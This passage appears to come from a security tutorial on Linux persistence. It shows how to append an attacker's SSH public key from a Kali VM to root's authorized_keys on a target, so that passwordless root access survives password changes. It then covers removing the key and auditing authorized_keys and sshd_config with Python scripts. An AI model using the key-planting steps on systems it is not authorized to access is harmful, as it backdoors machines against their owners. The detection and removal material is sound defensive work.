Linux Persistence Mechanisms

This will prompt you for a storage location for the public and private keys and for an optional passphrase.
2. Copy the content of the generated public key (id_rsa.pub) with cat, then append it to the authorized_keys file in the target user's .ssh directory on the Linux target system, using echo or cat with the append redirection operator >> and the file name as argument. For example:

```bash
# Copy the public key from the Kali VM to the clipboard
xclip -sel clip < ~/.ssh/id_rsa.pub

# Append the pasted key to authorized_keys on the target. Replace the
# placeholder with the key text; >> appends, whereas > would overwrite
# every key already in the file.
ssh root@target-ip "echo '<pasted public key>' >> /root/.ssh/authorized_keys"
```


3. Verify that the SSH daemon configuration file (usually /etc/ssh/sshd_config) allows public key authentication. The relevant directive is PubkeyAuthentication; check its setting with a script such as:

```bash
# Check whether sshd allows public key authentication.
# The directive is PubkeyAuthentication (AllowPublicKeyAuthentication does not
# exist). sshd honours the first uncommented occurrence, the keyword is
# case-insensitive, and the directive defaults to yes when absent, so a
# missing line does not mean the feature is disabled.
ssh_config="/etc/ssh/sshd_config"

# awk compares the first field case-insensitively; a line commented out with
# '#' has "#pubkeyauthentication" as its first field and so does not match.
setting=$(awk 'tolower($1) == "pubkeyauthentication" { print tolower($2); exit }' "$ssh_config")

case "$setting" in
  no) echo "Public key authentication is explicitly disabled." ;;
  "") echo "PubkeyAuthentication is not set; the sshd default is yes, so it is enabled." ;;
  *)  echo "Public key authentication is enabled (PubkeyAuthentication $setting)." ;;
esac

# Directives inside Match blocks can override this per user or address;
# "sudo sshd -T" prints the effective configuration.
```
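The grep-style check above looks for one literal line, which misses the rules sshd actually applies. The following Python script is an added example, not code from the original page or from OpenSSH: it parses sshd_config text and reports the effective PubkeyAuthentication value under those rules (keyword case-insensitive, whitespace or '=' separator, lines beginning with '#' ignored, first occurrence wins, compiled-in default when absent, Match blocks reported separately). The DEFAULTS table and the sample configuration are assumptions constructed for the demo; Include directives are not followed.

```python
"""Added example (not from the original page): effective PubkeyAuthentication
value from sshd_config text, applying the parsing rules of sshd_config(5)
rather than grepping for one literal line. Sample config is constructed."""
import os
import re
import sys

# Compiled-in defaults for the directives this check cares about (assumed
# from sshd_config(5); extend as needed)
DEFAULTS = {
    "pubkeyauthentication": "yes",
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
}


def parse_sshd_config(text):
    """Return (global_opts, match_blocks).

    global_opts maps lowercase keyword -> first value seen outside any Match
    block; match_blocks is a list of (criteria, {keyword: value}) in order.
    """
    global_opts = {}
    match_blocks = []
    current = None  # None while still in the global section
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        keyword = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "match":
            current = (value, {})
            match_blocks.append(current)
            continue
        target = global_opts if current is None else current[1]
        target.setdefault(keyword, value)  # first occurrence wins, later ones ignored
    return global_opts, match_blocks


def effective_value(keyword, text):
    """Effective global value of a directive: first explicit setting, else default."""
    global_opts, _ = parse_sshd_config(text)
    k = keyword.lower()
    value = global_opts.get(k, DEFAULTS.get(k))
    return value.lower() if value is not None else None


def match_overrides(keyword, text):
    """Match blocks that override the directive, as (criteria, value) pairs."""
    _, match_blocks = parse_sshd_config(text)
    k = keyword.lower()
    return [(crit, opts[k].lower()) for crit, opts in match_blocks if k in opts]


# Constructed sample: a commented-out line, a duplicate, and a Match override
SAMPLE_CONFIG = """\
# constructed sshd_config fragment for the demo
Port 22
#PubkeyAuthentication yes
PasswordAuthentication no
PasswordAuthentication yes
Match User backup
    PubkeyAuthentication no
"""


def report(text):
    """Human-readable summary for PubkeyAuthentication."""
    lines = ["PubkeyAuthentication (global): %s"
             % effective_value("PubkeyAuthentication", text)]
    for crit, value in match_overrides("PubkeyAuthentication", text):
        lines.append("  overridden to %s for: Match %s" % (value, crit))
    return "\n".join(lines)


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/ssh/sshd_config"
    if os.path.exists(path):
        with open(path, encoding="utf-8", errors="replace") as fh:
            print(report(fh.read()))
    else:
        print(report(SAMPLE_CONFIG))
```

On the sample, the global value is "yes" even though the only global PubkeyAuthentication line is commented out, because that is the default; the Match block for user backup is listed as an override. On a live host, "sudo sshd -T" remains the authoritative check, since it evaluates Include and Match the way the daemon does.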

4. Restart the SSH service using systemctl or service, followed by restart and the service name as arguments, e.g.:

```bash
# Restart the SSH daemon so it re-reads sshd_config.
# The unit is named ssh on Debian-based systems and sshd on Red Hat-based
# ones; use whichever exists on the target.
sudo systemctl restart ssh

# Older init systems: the same restart via the service command
sudo service ssh restart
```

5. Test SSH key-based authentication by connecting to the target system with your Kali VM's private key (id_rsa):

```bash
# Connect with the private key (-i). Leave ~ unquoted so the shell expands it,
# or use "$HOME/.ssh/id_rsa" if the path needs quoting.
ssh -i ~/.ssh/id_rsa root@target-ip
```

6. If successful, you can log in as "root" without entering a password. This persistence technique maintains access even after the account password has been changed or reset, because key-based authentication does not involve the password at all.
To remove this persistence mechanism, delete the public key from the authorized_keys file on the Linux target system using the following steps:
1. Connect to the target system as a privileged user (e.g., root) and change to the .ssh directory of the affected user account. For example:

```bash
# Log in to the target as root (or another privileged user)
ssh root@target-ip

# Once on the target, change to the affected user's .ssh directory and
# look at the keys. Note that running "cd" inside a one-off remote command
# (ssh host "cd dir") has no lasting effect: the remote shell exits as
# soon as the command finishes.
cd /home/user/.ssh
cat authorized_keys
```

2. Remove the public key from the authorized_keys file with a text editor or a command line tool such as sed, awk, or grep. For example:

```bash
# On the target, as root: delete the line that holds the unwanted key.
# Keep a backup of the file first.
cp /home/user/.ssh/authorized_keys /home/user/.ssh/authorized_keys.bak

# sed needs -i to edit the file in place; without it the result only goes
# to stdout and the file is unchanged. Match on a distinctive fragment of
# the key (its comment, or part of the base64 body): a full key contains
# '/' characters, which clash with sed's default pattern delimiter.
# Replace <key_fragment> with that fragment.
sed -i '/<key_fragment>/d' /home/user/.ssh/authorized_keys

# Confirm the line is gone (prints nothing once the fragment no longer matches)
grep -F '<key_fragment>' /home/user/.ssh/authorized_keys
```

3. Save and close the authorized_keys file.
4. Restart the SSH service using systemctl or service, followed by restart and the service name as arguments, e.g.:

```bash
# Restart the SSH daemon (unit name sshd on Red Hat-based systems, ssh on
# Debian-based ones). sshd reads authorized_keys on every login attempt,
# so the removed key is rejected immediately; the restart is still the
# right step after any change to sshd_config.
sudo systemctl restart sshd
```

5. Test that the public key has been removed by connecting to the target system again. If the removal succeeded, key authentication is no longer accepted and you are prompted for a password or another authentication method.
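Finding a planted key before removing it is easier with a parser than by eyeballing the file. The following Python script is an added example, not code from the original page or from OpenSSH: it parses each authorized_keys line into options, key type, fingerprint and comment, and reports keys whose fingerprint is not on an allow-list. The fingerprint is computed the way ssh-keygen -lf prints it (SHA256 over the decoded key blob, base64 without padding), which lets the allow-list be built from ssh-keygen output. The sample file, its key blobs (an ed25519 wire header followed by filler, so they decode but are not real keys) and the command-line usage are assumptions constructed for the demo.

```python
"""Added example (not from the original page): audit an authorized_keys file
against an allow-list of SHA256 fingerprints. Sample data is constructed."""
import base64
import binascii
import hashlib
import sys
from dataclasses import dataclass, field

# A line starts with the key type unless an options field precedes it
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


@dataclass
class Entry:
    line_no: int
    key_type: str
    fingerprint: str  # None when the base64 blob does not decode
    comment: str
    options: list = field(default_factory=list)


def fingerprint(blob_b64):
    """SHA256 fingerprint in ssh-keygen format, or None for an undecodable blob."""
    try:
        raw = base64.b64decode(blob_b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def _scan_options(s):
    """Split off the leading options field; spaces inside double quotes do not end it."""
    i, quoted = 0, False
    while i < len(s):
        ch = s[i]
        if ch == "\\":
            i += 2  # skip the escaped character
            continue
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            break
        i += 1
    return s[:i], s[i:].strip()


def _split_options(opts):
    """Split the options field on commas that are outside double quotes."""
    out, cur, quoted, i = [], [], False, 0
    while i < len(opts):
        ch = opts[i]
        if ch == "\\" and i + 1 < len(opts):
            cur.append(opts[i:i + 2])
            i += 2
            continue
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
        i += 1
    if cur:
        out.append("".join(cur))
    return out


def parse_line(line_no, line):
    """Parse one authorized_keys line; returns None for blanks and comments."""
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    options = []
    if not s.startswith(KEY_TYPE_PREFIXES):
        raw_opts, s = _scan_options(s)
        options = _split_options(raw_opts)
    parts = s.split(None, 2)  # key-type, blob, optional comment
    if len(parts) < 2:
        return Entry(line_no, parts[0] if parts else "", None, "", options)
    comment = parts[2] if len(parts) > 2 else ""
    return Entry(line_no, parts[0], fingerprint(parts[1]), comment, options)


def parse_file(text):
    entries = (parse_line(n, l) for n, l in enumerate(text.splitlines(), 1))
    return [e for e in entries if e is not None]


def audit(text, allowed_fingerprints):
    """(line_no, finding, entry) for keys that are malformed or not on the allow-list."""
    findings = []
    for e in parse_file(text):
        if e.fingerprint is None:
            findings.append((e.line_no, "malformed", e))
        elif e.fingerprint not in allowed_fingerprints:
            findings.append((e.line_no, "unknown-key", e))
    return findings


# Constructed sample: blobs are an ed25519 wire header plus filler, not real keys
_HEADER = "AAAAC3NzaC1lZDI1NTE5AAAAI"
BLOB_A, BLOB_B, BLOB_C = (_HEADER + c * 43 for c in "ABC")
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample file",
    "ssh-ed25519 " + BLOB_A + " alice@laptop",
    'command="/usr/local/bin/backup --run",no-pty,from="10.0.0.0/8" ssh-ed25519 '
    + BLOB_B + " backup@nas",
    "",
    "ssh-ed25519 " + BLOB_C + " kali",
])

if __name__ == "__main__":
    # Assumed usage: audit.py <authorized_keys> <file of allowed SHA256 fingerprints>
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    allowed = set(open(sys.argv[2], encoding="utf-8").read().split())
    for n, kind, e in audit(text, allowed):
        print("line %d: %s %s %s" % (n, kind, e.key_type, e.comment))
```

With alice's and the backup key's fingerprints on the allow-list, the audit flags only the third entry ("kali") as an unknown key, and it does so by fingerprint, so renaming the comment on a planted key does not hide it. Run the same audit over every user's ~/.ssh/authorized_keys (and any AuthorizedKeysFile paths set in sshd_config) rather than only root's.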
